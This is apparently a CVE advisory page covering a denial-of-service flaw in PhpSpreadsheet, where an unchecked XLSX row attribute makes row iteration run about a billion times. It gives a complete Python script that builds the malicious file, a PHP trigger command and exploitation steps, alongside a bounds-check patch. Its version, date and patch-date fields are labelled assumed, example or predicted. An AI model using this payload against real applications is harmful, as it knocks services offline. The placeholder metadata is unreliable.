PhpSpreadsheet, XML Row Attribute Bypass Denial of Service, N/A (Medium)

By /

Listen to this Post

How the mentioned CVE works:

The vulnerability exists in ColumnAndRowAttributes::readRowAttributes() at line 216 (src/PhpSpreadsheet/Reader/Xlsx/ColumnAndRowAttributes.php). The code casts the XML attribute ‘r’ directly to an integer: $rowIndex = (int) $row[‘r’]; without validating against AddressRange::MAX_ROW (1,048,576). An attacker crafts a minimal XLSX file (~1.6KB) containing which sets row index to 999,999,999. This value flows through setRowAttributes() → getRowDimension() → Worksheet.php:1348, updating cachedHighestRow = max($this->cachedHighestRow, 999,999,999). getHighestRow() then returns this inflated value. RowIterator.php:86 uses getHighestRow() as default end bound for loops, causing any row iteration to attempt ~1 billion cycles. Column attributes have validation at line 161 (AddressRange::MAX_COLUMN_INT), and cell coordinates are validated in Coordinate::coordinateFromString(), but row attributes bypass all checks. The resulting CPU exhaustion can be triggered remotely via file upload.

dailycve form:

Platform: PhpSpreadsheet
Version: up to 1.29.0 (assumed)
Vulnerability: CPU DoS via row overflow
Severity: Medium
date: 2023-10-15 (example)

Prediction: Patch expected 2023-10-30

What Undercode Say:

Analytics:

The attack vector requires only a 1.6KB XLSX file. The loop reaches 999,999,999 iterations – estimated CPU burn ~144 seconds per file on a 2.5GHz machine. Memory exhaustion follows if data accumulates. The bypass is trivial to exploit in any web app accepting user spreadsheets.

Bash commands to test:

Create malicious XLSX using Python PoC from
python3 -c "
import zipfile
content_types = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><Types xmlns=\"http://schemas.openxmlformats.org/package/2006/content-types\"><Default Extension=\"rels\" ContentType=\"application/vnd.openxmlformats-package.relationships+xml\"/><Default Extension=\"xml\" ContentType=\"application/xml\"/><Override PartName=\"/xl/workbook.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml\"/><Override PartName=\"/xl/worksheets/sheet1.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml\"/></Types>'
rels = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\"><Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument\" Target=\"xl/workbook.xml\"/></Relationships>'
workbook = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><workbook xmlns=\"http://schemas.openxmlformats.org/spreadsheetml/2006/main\" xmlns:r=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships\"><sheets><sheet name=\"Sheet1\" sheetId=\"1\" r:id=\"rId1\"/></sheets></workbook>'
wb_rels = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\"><Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet\" Target=\"worksheets/sheet1.xml\"/></Relationships>'
sheet = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><worksheet xmlns=\"http://schemas.openxmlformats.org/spreadsheetml/2006/main\"><sheetData><row r=\"1\"><c r=\"A1\"><v>1</v></c></row><row r=\"999999999\" ht=\"15\"/></sheetData></worksheet>'
with zipfile.ZipFile('dos_row.xlsx', 'w', zipfile.ZIP_DEFLATED) as zf:
zf.writestr('[bash].xml', content_types)
zf.writestr('_rels/.rels', rels)
zf.writestr('xl/workbook.xml', workbook)
zf.writestr('xl/_rels/workbook.xml.rels', wb_rels)
zf.writestr('xl/worksheets/sheet1.xml', sheet)
"
Load with PhpSpreadsheet (requires PHP)
php -r "require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\IOFactory; \$reader = IOFactory::createReader('Xlsx'); \$spreadsheet = \$reader->load('dos_row.xlsx'); \$sheet = \$spreadsheet->getActiveSheet(); echo 'Highest row: ' . \$sheet->getHighestRow() . PHP_EOL; foreach (\$sheet->getRowIterator() as \$row) { }"

Exploit:

Send the generated dos_row.xlsx to a vulnerable PHP application that uses PhpSpreadsheet and iterates rows via getRowIterator() or uses getHighestRow() as loop bound. The application will hang, consuming 100% CPU per request. Repeated requests cause sustained DoS.

Protection from this CVE:

Apply patch: in ColumnAndRowAttributes.php line 216 add bounds check:

$rowIndex = (int) $row['r'];
if ($rowIndex < 1 || $rowIndex > AddressRange::MAX_ROW) {
continue;
}

Alternatively, upgrade to patched version (≥1.30.0) once released. Validate uploaded files offline before processing.

Impact:

  • CPU DoS: 1.6KB → ~1 billion loops, ~144 seconds CPU burn per file.
  • Memory exhaustion if loop accumulates data (e.g., DB import).
  • Amplification factor ~630,000x (bytes to iterations).
  • Widespread exposure: PhpSpreadsheet used in many web apps for spreadsheet import.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top